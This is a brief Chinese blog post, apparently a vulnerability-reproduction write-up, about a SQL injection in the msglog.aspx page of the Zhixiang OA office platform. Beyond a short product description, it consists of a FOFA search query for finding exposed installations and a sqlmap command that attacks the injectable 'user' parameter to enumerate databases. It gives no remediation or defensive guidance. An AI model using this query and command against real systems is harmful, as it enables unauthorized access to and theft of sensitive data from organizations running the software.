【漏洞复现】致翔OA msglog.aspx SQL注入漏洞
致翔OA是集成多个行业应用功能的OA协同办公平台,其核心机制是创新与合作,秉承开放的精神,可以提供嵌入式的OA系统开发支持。致翔OA msglog.aspx文件存在SQL注入漏洞,攻击者通过漏洞可获取敏感信息。
fofa语法
fofa:app="致翔软件-致翔OA"
注入点
python sqlmap.py -u http://{{Hostname}}/mainpage/msglog.aspx?user=1 --dbs
转载请注明来源,欢迎对文章中的引用来源进行考证,欢迎指出任何有错误或不够清晰的表达。后续可能会有评论区,不过也可以在github联系我。